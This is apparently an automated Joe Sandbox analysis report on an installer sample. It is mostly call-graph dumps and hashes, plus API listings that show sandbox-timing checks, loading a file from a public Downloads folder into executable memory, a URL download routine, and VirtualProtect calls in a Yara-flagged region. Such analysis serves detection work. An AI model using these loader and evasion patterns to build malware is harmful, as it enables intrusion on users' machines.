Mailbox 25415->25417 25423 3a10d4 82 API calls 3 library calls 25415->25423 25417->25278 25419 3a448c std::_Mutex::_Mutex 77 API calls 25418->25419 25420 3a3a53 25419->25420 25424 3a3b61 InitializeCriticalSection 25420->25424 25422 3a1d07 25422->25414 25423->25417 25424->25422 25425->25283 25426->25285 25427->25290 25428->25290 25430 3a2222 __EH_prolog 25429->25430 25431 3a2257 25430->25431 25439 3a1f6a 67 API calls 25430->25439 25431->25264 25433 3a184b 25431->25433 25434 3a1907 25433->25434 25435 3a1864 _memmove 25433->25435 25434->25264 25435->25434 25440 3a297f 25435->25440 25437->25266 25438->25268 25439->25431 25442 3a2984 Mailbox __EH_prolog 25440->25442 25441 3a2993 Mailbox 25441->25435 25442->25441 25443 3a29e0 25442->25443 25444 3a29f4 25442->25444 25452 3a1fe5 25443->25452 25455 3a252d 77 API calls 2 library calls 25444->25455 25447 3a2aaf 25447->25441 25448 3a1fe5 _Fputc 99 API calls 25447->25448 25448->25441 25449 3a2a10 25449->25441 25449->25447 25456 3a566a 99 API calls 3 library calls 25449->25456 25457 3a2423 77 API calls 2 library calls 25449->25457 25458 3a4dc5 25452->25458 25454 3a1ff5 25454->25441 25455->25449 25456->25449 25457->25449 25459 3a4dd1 __fsopen 25458->25459 25460 3a4dfc 25459->25460 25461 3a4de4 25459->25461 25477 3a50e4 25460->25477 25504 3aa95f 66 API calls __getptd_noexit 25461->25504 25465 3a4de9 25505 3aa90d 11 API calls __fsopen 25465->25505 25466 3a4e77 25469 3a4e85 25466->25469 25483 3ab109 25466->25483 25515 3a4eb9 LeaveCriticalSection LeaveCriticalSection _fputc 25469->25515 25472 3a4df4 __fsopen 25472->25454 25473 3a4e12 25473->25466 25513 3aa95f 66 API calls __getptd_noexit 25473->25513 25475 3a4e6c 25514 3aa90d 11 API calls __fsopen 25475->25514 25478 3a5118 EnterCriticalSection 25477->25478 25479 3a50f6 25477->25479 25480 3a4e02 25478->25480 25479->25478 25481 3a50fe 25479->25481 25480->25466 25506 3ab0e3 25480->25506 25516 3ab7b7 25481->25516 25484 3ab0e3 __ftell_nolock 66 API calls 25483->25484 25485 3ab119 25484->25485 25486 3ab13b 25485->25486 25487 3ab124 25485->25487 25489 3ab13f 25486->25489 25490 3ab14c _vwprintf_helper 25486->25490 25579 3aa95f 66 API calls __getptd_noexit 25487->25579 25580 3aa95f 66 API calls __getptd_noexit 25489->25580 25492 3ab129 25490->25492 25500 3ab1a2 25490->25500 25503 3ab1ad 25490->25503 25581 3b23d6 25490->25581 25492->25469 25493 3ab23c 25495 3abee7 __write 97 API calls 25493->25495 25494 3ab1bc 25496 3ab1d3 25494->25496 25499 3ab1f0 25494->25499 25495->25492 25554 3abee7 25496->25554 25499->25492 25590 3ac501 71 API calls 5 library calls 25499->25590 25500->25503 25551 3ab26d 25500->25551 25503->25493 25503->25494 25504->25465 25505->25472 25507 3ab0ef 25506->25507 25508 3ab104 25506->25508 25684 3aa95f 66 API calls __getptd_noexit 25507->25684 25508->25473 25510 3ab0f4 25685 3aa90d 11 API calls __fsopen 25510->25685 25512 3ab0ff 25512->25473 25513->25475 25514->25466 25515->25472 25517 3ab7df EnterCriticalSection 25516->25517 25518 3ab7cc 25516->25518 25517->25480 25523 3ab6f5 25518->25523 25520 3ab7d2 25520->25517 25550 3ab61f 66 API calls 3 library calls 25520->25550 25524 3ab701 __fsopen 25523->25524 25525 3ab729 25524->25525 25526 3ab711 25524->25526 25529 3a63b8 __malloc_crt 65 API calls 25525->25529 25534 3ab737 __fsopen 25525->25534 25527 3ac970 __FF_MSGBANNER 65 API calls 25526->25527 25528 3ab716 25527->25528 25530 3ac7c1 __NMSG_WRITE 65 API calls 25528->25530 25531 3ab742 25529->25531 25535 3ab71d 25530->25535 25532 3ab758 25531->25532 25533 3ab749 25531->25533 25537 3ab7b7 __lock 65 API calls 25532->25537 25536 3aa95f __fsopen 65 API calls 25533->25536 25534->25520 25538 3ab37d _fast_error_exit GetModuleHandleW GetProcAddress ExitProcess 25535->25538 25536->25534 25539 3ab75f 25537->25539 25540 3ab727 25538->25540 25541 3ab792 25539->25541 25542 3ab767 InitializeCriticalSectionAndSpinCount 25539->25542 25540->25525 25544 3a4452 _free 65 API calls 25541->25544 25543 3ab777 25542->25543 25549 3ab783 25542->25549 25545 3a4452 _free 65 API calls 25543->25545 25544->25549 25547 3ab77d 25545->25547 25546 3ab7ae __mtinitlocknum LeaveCriticalSection 25546->25534 25548 3aa95f __fsopen 65 API calls 25547->25548 25548->25549 25549->25546 25591 3a63b8 25551->25591 25555 3abef3 __fsopen 25554->25555 25556 3abefb 25555->25556 25557 3abf16 25555->25557 25673 3aa972 66 API calls __getptd_noexit 25556->25673 25559 3abf22 25557->25559 25562 3abf5c 25557->25562 25675 3aa972 66 API calls __getptd_noexit 25559->25675 25560 3abf00 25674 3aa95f 66 API calls __getptd_noexit 25560->25674 25597 3b3e85 25562->25597 25564 3abf27 25676 3aa95f 66 API calls __getptd_noexit 25564->25676 25567 3abf62 25569 3abf70 25567->25569 25570 3abf84 25567->25570 25568 3abf2f 25677 3aa90d 11 API calls __fsopen 25568->25677 25607 3ab7ea 25569->25607 25678 3aa95f 66 API calls __getptd_noexit 25570->25678 25572 3abf08 __fsopen 25572->25492 25575 3abf7c 25680 3abfb3 LeaveCriticalSection __unlock_fhandle 25575->25680 25576 3abf89 25679 3aa972 66 API calls __getptd_noexit 25576->25679 25579->25492 25580->25492 25582 3b23e3 25581->25582 25583 3b23f2 25581->25583 25681 3aa95f 66 API calls __getptd_noexit 25582->25681 25585 3b2410 25583->25585 25682 3aa95f 66 API calls __getptd_noexit 25583->25682 25585->25500 25587 3b23e8 25587->25500 25588 3b2403 25683 3aa90d 11 API calls __fsopen 25588->25683 25590->25492 25593 3a63c1 25591->25593 25592 3a729e _malloc 65 API calls 25592->25593 25593->25592 25594 3a63f7 25593->25594 25595 3a63d8 Sleep 25593->25595 25594->25503 25596 3a63ed 25595->25596 25596->25593 25596->25594 25598 3b3e91 __fsopen 25597->25598 25599 3b3eeb 25598->25599 25601 3ab7b7 __lock 66 API calls 25598->25601 25600 3b3ef0 EnterCriticalSection 25599->25600 25602 3b3f0d __fsopen 25599->25602 25600->25602 25603 3b3ebd 25601->25603 25602->25567 25604 3b3ed9 25603->25604 25605 3b3ec6 InitializeCriticalSectionAndSpinCount 25603->25605 25606 3b3f1b ___lock_fhandle LeaveCriticalSection 25604->25606 25605->25604 25606->25599 25608 3ab7f9 __ftelli64_nolock 25607->25608 25609 3ab84e 25608->25609 25610 3ab82f 25608->25610 25642 3ab824 25608->25642 25615 3ab8aa 25609->25615 25616 3ab88d 25609->25616 25611 3aa972 __read_nolock 66 API calls 25610->25611 25613 3ab834 25611->25613 25612 3a65d1 __setmbcp_nolock 5 API calls 25614 3abee5 25612->25614 25620 3aa95f __fsopen 66 API calls 25613->25620 25614->25575 25618 3ab8c0 25615->25618 25619 3ab8b1 25615->25619 25617 3aa972 __read_nolock 66 API calls 25616->25617 25621 3ab892 25617->25621 25624 3b23d6 __stbuf 66 API calls 25618->25624 25622 3ac47c __lseeki64_nolock 68 API calls 25619->25622 25623 3ab83b 25620->25623 25625 3aa95f __fsopen 66 API calls 25621->25625 25626 3ab8bd 25622->25626 25627 3aa90d __fsopen 11 API calls 25623->25627 25628 3ab8c6 25624->25628 25629 3ab89a 25625->25629 25626->25618 25627->25642 25630 3abb68 25628->25630 25634 3a979c __getptd 66 API calls 25628->25634 25631 3aa90d __fsopen 11 API calls 25629->25631 25632 3abe18 WriteFile 25630->25632 25633 3abb77 25630->25633 25631->25642 25636 3abe4b GetLastError 25632->25636 25637 3abb4a 25632->25637 25638 3abc32 25633->25638 25643 3abb8a 25633->25643 25635 3ab8e1 GetConsoleMode 25634->25635 25635->25630 25639 3ab90a 25635->25639 25636->25637 25640 3abe96 25637->25640 25637->25642 25646 3abe69 25637->25646 25650 3abd0c 25638->25650 25653 3abc3f 25638->25653 25639->25630 25641 3ab91a GetConsoleCP 25639->25641 25640->25642 25645 3aa95f __fsopen 66 API calls 25640->25645 25641->25637 25668 3ab93d 25641->25668 25642->25612 25643->25640 25644 3abbd4 WriteFile 25643->25644 25644->25636 25648 3abc08 25644->25648 25647 3abeb9 25645->25647 25651 3abe88 25646->25651 25652 3abe74 25646->25652 25656 3aa972 __read_nolock 66 API calls 25647->25656 25648->25637 25648->25643 25660 3abc2d 25648->25660 25649 3abd7d WideCharToMultiByte 25649->25636 25658 3abdb4 WriteFile 25649->25658 25650->25640 25650->25649 25659 3aa985 __dosmaperr 66 API calls 25651->25659 25657 3aa95f __fsopen 66 API calls 25652->25657 25653->25640 25654 3abcae WriteFile 25653->25654 25654->25636 25655 3abce2 25654->25655 25655->25637 25655->25653 25655->25660 25656->25642 25661 3abe79 25657->25661 25662 3abdeb GetLastError 25658->25662 25666 3abddf 25658->25666 25659->25642 25660->25637 25664 3aa972 __read_nolock 66 API calls 25661->25664 25662->25666 25663 3b25d6 __write_nolock 76 API calls 25663->25668 25664->25642 25665 3b3cfb 78 API calls __fassign 25665->25668 25666->25637 25666->25650 25666->25658 25666->25660 25667 3ab9e9 WideCharToMultiByte 25667->25637 25669 3aba1a WriteFile 25667->25669 25668->25637 25668->25663 25668->25665 25668->25667 25670 3aba41 25668->25670 25669->25636 25669->25670 25670->25636 25670->25637 25670->25668 25671 3b3ba3 WriteConsoleW CreateFileW __write_nolock 25670->25671 25672 3aba6e WriteFile 25670->25672 25671->25670 25672->25636 25672->25670 25673->25560 25674->25572 25675->25564 25676->25568 25677->25572 25678->25576 25679->25575 25680->25572 25681->25587 25682->25588 25683->25587 25684->25510 25685->25512 25686->25203 25687->25205 25688->25207 25689->25209 25693 3aac24 25690->25693 25696 3aab9f 25693->25696 25695 3a1216 25695->25214 25695->25215 25697 3aabab _vwprintf_helper __fsopen 25696->25697 25698 3aabc2 25697->25698 25699 3aabd7 25697->25699 25711 3aa95f 66 API calls __getptd_noexit 25698->25711 25701 3a50e4 __lock_file 67 API calls 25699->25701 25703 3aabdd 25701->25703 25702 3aabc7 25712 3aa90d 11 API calls __fsopen 25702->25712 25713 3a9a60 66 API calls 4 library calls 25703->25713 25706 3aabe8 25714 3a9afc 97 API calls __flush 25706->25714 25707 3aabd2 __fsopen 25707->25695 25709 3aac01 25715 3aac1c LeaveCriticalSection LeaveCriticalSection _fputc 25709->25715 25711->25702 25712->25707 25713->25706 25714->25709 25715->25707
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID: (oq$(oq$(oq$(oq$(oq$(oq$(oq
                • API String ID: 0-2785030291
                • Opcode ID: d7aaa6fa68cf118efa6fc9529790481dacec52f2563f77a55886742990544aee
                • Instruction ID: 937262a5f2582a32cdde2d574eaa95a7f30be81cb1cb9edd61ab9b3c5390d5da
                • Opcode Fuzzy Hash: d7aaa6fa68cf118efa6fc9529790481dacec52f2563f77a55886742990544aee
                • Instruction Fuzzy Hash: C9824832A04209DFCB14CF69D994AAEFBF2FF88314F158569E8469B2A5D770E841CB50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID: (oq$(oq$(oq
                • API String ID: 0-3376450984
                • Opcode ID: e82697b6818493290fbd97e9ad7f54619ddf2cf6ce2010fe767974663b80e6dc
                • Instruction ID: d2bfeea7e9f6d4e737a483e5f064bb579a67651c25975fa150b1a1057e4f4421
                • Opcode Fuzzy Hash: e82697b6818493290fbd97e9ad7f54619ddf2cf6ce2010fe767974663b80e6dc
                • Instruction Fuzzy Hash: 1F725B72A002199FDB15DF69C954AAEBBF6FF88300F148169E846EB3A4DB74DC41CB50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID: Teq
                • API String ID: 0-1098410595
                • Opcode ID: 11f115f6043608448827a5da2d1d23ef673aff27649dfea5b3091ece30238932
                • Instruction ID: 14420a1df1b8be924a053335f94e765f5c7c6935e6c67f392a406165abdd2a8a
                • Opcode Fuzzy Hash: 11f115f6043608448827a5da2d1d23ef673aff27649dfea5b3091ece30238932
                • Instruction Fuzzy Hash: 12628039B00310CBDB18EB75D868B6E77A7EFC5710F154169E8069B3A4DF399C828B91
                APIs
                • __EH_prolog.LIBCMT ref: 003A25C8
                  • Part of subcall function 003A221D: __EH_prolog.LIBCMT ref: 003A2222
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 6ccec3e5f62dcff7b53ef0427f6f91d8b9ef952e0cc2d517c2a72ad1e89c4f83
                • Instruction ID: 8d723cd78098be37aed0c8598b6970fa52ef6f1fce7e1c311263d90c122087ed
                • Opcode Fuzzy Hash: 6ccec3e5f62dcff7b53ef0427f6f91d8b9ef952e0cc2d517c2a72ad1e89c4f83
                • Instruction Fuzzy Hash: A1114C75901258EFCF12DF98CA90AAEBBB4FF19314F10805EE5126B261C7759E00DFA1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID: \Vhm
                • API String ID: 0-1451868494
                • Opcode ID: f749187bdcf0f3fc9a6e56b4960468edd704ea9f82a83ef1bf07292f68cb1160
                • Instruction ID: f18e634ccd07de81810fe953dee6b7221f63ff9b25b57a730afee11f97ac91e3
                • Opcode Fuzzy Hash: f749187bdcf0f3fc9a6e56b4960468edd704ea9f82a83ef1bf07292f68cb1160
                • Instruction Fuzzy Hash: FCB12D71E002099FDF14CFA9D885BEDBBF2FF88314F148529D815AB294EBB49845CB91
                Memory Dump Source
                • Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: deddfae4159784561ad5519f9daceea9e369e30bb050a3edc601fdf305a2f71c
                • Instruction ID: ab78f2a4c7d3adf0e7a4135e4e247bb083a27939da57e23df55da957411f9b25
                • Opcode Fuzzy Hash: deddfae4159784561ad5519f9daceea9e369e30bb050a3edc601fdf305a2f71c
                • Instruction Fuzzy Hash: F8B12972E00209DFDF15CFA9D885BADBBF2FB88314F148529D815EB294EB749845CB81

                Control-flow Graph

                APIs
                • GetTickCount64.KERNEL32 ref: 003A11EF
                • Sleep.KERNEL32(0000012C), ref: 003A11F9
                • GetTickCount64.KERNEL32 ref: 003A11FF
                  • Part of subcall function 003A4424: __vwprintf_l.LIBCMT ref: 003A4432
                • CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.cod,80000000,00000001,00000000,00000004,00000080,00000000), ref: 003A1244
                • GetFileSize.KERNEL32(00000000,00000000), ref: 003A124E
                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 003A125F
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003A1270
                • CloseHandle.KERNEL32(00000000), ref: 003A1277
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: File$Count64Tick$AllocCloseCreateHandleReadSizeSleepVirtual__vwprintf_l
                • String ID: C:\Users\Public\Downloads\ind.cod$sandbox!!!$v4:%d
                • API String ID: 1694741105-2571094725
                • Opcode ID: 990bb8d545a53f0232267ac25b8481a9311d14ed8c60dd31e6376acaafd5ea9b
                • Instruction ID: a45d7724c295ecc755c6a8635de2df5ebb2f3e9637e6cd904ad0c2a3b69820fd
                • Opcode Fuzzy Hash: 990bb8d545a53f0232267ac25b8481a9311d14ed8c60dd31e6376acaafd5ea9b
                • Instruction Fuzzy Hash: 6711B473A042287FE72267F9AC4AFAB7A6CDB87774F210626FB05D2190D5A05C0082B1

                Control-flow Graph

                APIs
                • __EH_prolog.LIBCMT ref: 003A2E5D
                • InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 003A2E79
                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 003A2E96
                • InternetCloseHandle.WININET(?), ref: 003A2F2A
                  • Part of subcall function 003A2D2E: __EH_prolog.LIBCMT ref: 003A2D33
                • InternetReadFile.WININET(?,?,00001000,?), ref: 003A2EFC
                • InternetCloseHandle.WININET(?), ref: 003A2F12
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: Internet$CloseH_prologHandleOpen$FileRead
                • String ID: Download
                • API String ID: 2208602198-2171396134
                • Opcode ID: 367256692e4e5bcc2cbca1c1f668c1a631a0730165b7a04c66f6381792a2c1b1
                • Instruction ID: 2ab3ec8a744acb6850ea585317a619e15e9f0e56107f8abcec423a9a7eb046e3
                • Opcode Fuzzy Hash: 367256692e4e5bcc2cbca1c1f668c1a631a0730165b7a04c66f6381792a2c1b1
                • Instruction Fuzzy Hash: D121077590011AEEEF229B98CC85FEFBB7CFB05354F10026AB616A6191D7705E84DE60

                Control-flow Graph

                APIs
                • __EH_prolog.LIBCMT ref: 003A2E5D
                • InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 003A2E79
                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 003A2E96
                • InternetCloseHandle.WININET(?), ref: 003A2F2A
                  • Part of subcall function 003A2D2E: __EH_prolog.LIBCMT ref: 003A2D33
                • InternetReadFile.WININET(?,?,00001000,?), ref: 003A2EFC
                • InternetCloseHandle.WININET(?), ref: 003A2F12
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: Internet$CloseH_prologHandleOpen$FileRead
                • String ID: Download
                • API String ID: 2208602198-2171396134
                • Opcode ID: 44d5abe3df26e953af9c2058ef2be5a2e72b8e2b9943a5c7a6e5756017e0d34e
                • Instruction ID: 5dfe51dbfc2dfda67f96d05b9f07a70ce7f66cc8208fe320f6ee25f05c52d360
                • Opcode Fuzzy Hash: 44d5abe3df26e953af9c2058ef2be5a2e72b8e2b9943a5c7a6e5756017e0d34e
                • Instruction Fuzzy Hash: 0B113A75900119EFEB129B98CC85FEFBB7CEB49354F10016AF616B6191C6705E84DA20

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 440 2edffe7-2edfffc LoadLibraryA 441 2edfffe-2edffff 440->441 442 2ee0004-2ee0015 440->442 443 2ee00c9-2ee00cc 441->443 445 2ee001b-2ee0026 442->445 446 2ee00c5 442->446 445->446 447 2ee002c-2ee003a VirtualProtect 445->447 448 2ee00c7-2ee00c8 446->448 447->446 449 2ee0040-2ee007a call 2ee161e call 2ee18bb VirtualProtect 447->449 448->443 449->446 455 2ee007c-2ee0088 449->455 455->446 456 2ee008a-2ee0098 VirtualProtect 455->456 456->446 457 2ee009a-2ee00c3 call 2ee161e call 2ee18bb VirtualProtect 456->457 457->448
                APIs
                • LoadLibraryA.KERNEL32(?,00000000,00000002,?,02EDFCB5,00000000), ref: 02EDFFF5
                • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,02EDFCB5,00000000), ref: 02EE0035
                • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 02EE0068
                • VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 02EE0093
                • VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 02EE00BD
                Memory Dump Source
                • Source File: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2ed0000_103-o_Installer.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual$LibraryLoad
                • String ID:
                • API String ID: 895956442-0
                • Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
                • Instruction ID: 861a05e5cc3365fe11dc3861ee29d149215e9d8934f262f7bc09e9695adbc1fb
                • Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
                • Instruction Fuzzy Hash: D921C5B224130A6FDB609A64CC88E7B77ECEB84305B045C3DBE47E2450EBB4E9448A60

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 462 3a297f-3a2991 call 3a4948 465 3a2993-3a2995 462->465 466 3a2997-3a29a1 462->466 467 3a29bf-3a29cc 465->467 468 3a29cf-3a29d2 466->468 469 3a29a3-3a29ac 466->469 471 3a29ef-3a29f2 468->471 472 3a29d4-3a29de call 3a19a1 468->472 469->468 470 3a29ae-3a29ba 469->470 473 3a29bc 470->473 475 3a29be 471->475 477 3a29e0-3a29e4 call 3a1fe5 472->477 478 3a29f4-3a2a10 call 3a252d 472->478 473->475 475->467 482 3a29e9-3a29ed 477->482 483 3a2a13-3a2a1a 478->483 482->471 482->473 484 3a2a20-3a2a23 483->484 485 3a2aa7-3a2aaa 483->485 486 3a2a25-3a2a48 484->486 485->486 488 3a2a4a-3a2a4d 486->488 489 3a2ac5 486->489 490 3a2aaf-3a2ab2 488->490 491 3a2a4f-3a2a56 488->491 492 3a2ac8-3a2ad6 call 3a1c2d 489->492 490->489 493 3a2ab4-3a2ac3 call 3a1fe5 490->493 494 3a2a5b-3a2a60 491->494 495 3a2a58 491->495 492->475 493->489 501 3a2adb-3a2ade 493->501 498 3a2a62-3a2a69 494->498 499 3a2a81-3a2a8b 494->499 495->494 504 3a2a6b 498->504 505 3a2a6e-3a2a7f call 3a566a 498->505 499->501 502 3a2a8d-3a2a8f 499->502 501->492 502->483 506 3a2a91-3a2a95 502->506 504->505 505->489 505->499 506->489 508 3a2a97-3a2aa2 call 3a2423 506->508 508->483
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                • Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd
                Similarity
                • API ID: Fputc$H_prolog
                • String ID:
                • API String ID: 1896196775-3916222277
                • Opcode ID: bdaf987eb92baa9bad55c814e67242334d8216569f66f1728ea4cae15efbe1bc
                • Instruction ID: 85b5c48841ce87d0a10af4aa0d7734f82ea945cfdeb0167a501043fb63a1ee3f
                • Opcode Fuzzy Hash: bdaf987eb92baa9bad55c814e67242334d8216569f66f1728ea4cae15efbe1bc
                • Instruction Fuzzy Hash: D24170329016099FCF26CB98C940AEFB7F6FF5A710F21051EE552A7680DB71AD44CB61

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 512 2ee00cd-2ee00e2 514 2ee00ea-2ee00fb 512->514 515 2ee00e4-2ee00e5 512->515 518 2ee01ab 514->518 519 2ee0101-2ee010c 514->519 516 2ee01af-2ee01b2 515->516 520 2ee01ad-2ee01ae 518->520 519->518 521 2ee0112-2ee0120 VirtualProtect 519->521 520->516 521->518 522 2ee0126-2ee0160 call 2ee161e call 2ee18bb VirtualProtect 521->522 522->518 528 2ee0162-2ee016e 522->528 528->518 529 2ee0170-2ee017e VirtualProtect 528->529 529->518 530 2ee0180-2ee01a9 call 2ee161e call 2ee18bb VirtualProtect 529->530 530->520
                APIs
                • VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 02EE011B
                • VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 02EE014E
                • VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 02EE0179
                • VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 02EE01A3
                Memory Dump Source
                • Source File: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2ed0000_103-o_Installer.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
                • Instruction ID: ba40efc57612b26495d854f80d2e0acda064efd447bc176ad2a3584458e38386
                • Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
                • Instruction Fuzzy Hash: 8B2188B22447456FEB209A61CC88F7777FCEB88345B04583DBA87E5541EBB4E9058A70

                Control-flow Graph

                APIs
                  • Part of subcall function 003A1186: __time64.LIBCMT ref: 003A118E
                  • Part of subcall function 003A1186: _rand.LIBCMT ref: 003A119E
                  • Part of subcall function 003A1186: _rand.LIBCMT ref: 003A11AD
                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 003A2F4E
                  • Part of subcall function 003A2E58: __EH_prolog.LIBCMT ref: 003A2E5D
                  • Part of subcall function 003A2E58: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 003A2E79
                  • Part of subcall function 003A2E58: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 003A2E96
                  • Part of subcall function 003A2E58: InternetReadFile.WININET(?,?,00001000,?), ref: 003A2EFC
                  • Part of subcall function 003A2E58: InternetCloseHandle.WININET(?), ref: 003A2F12
                  • Part of subcall function 003A2E58: InternetCloseHandle.WININET(?), ref: 003A2F2A
                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 003A2F6F
                  • Part of subcall function 003A168B: _wprintf.LIBCMT ref: 003A169D
                  • Part of subcall function 003A168B: _wprintf.LIBCMT ref: 003A16B5
                  • Part of subcall function 003A168B: _wprintf.LIBCMT ref: 003A16CD
                  • Part of subcall function 003A168B: _wprintf.LIBCMT ref: 003A16E5
                  • Part of subcall function 003A11E1: GetTickCount64.KERNEL32 ref: 003A11EF
                  • Part of subcall function 003A11E1: Sleep.KERNEL32(0000012C), ref: 003A11F9
                  • Part of subcall function 003A11E1: GetTickCount64.KERNEL32 ref: 003A11FF
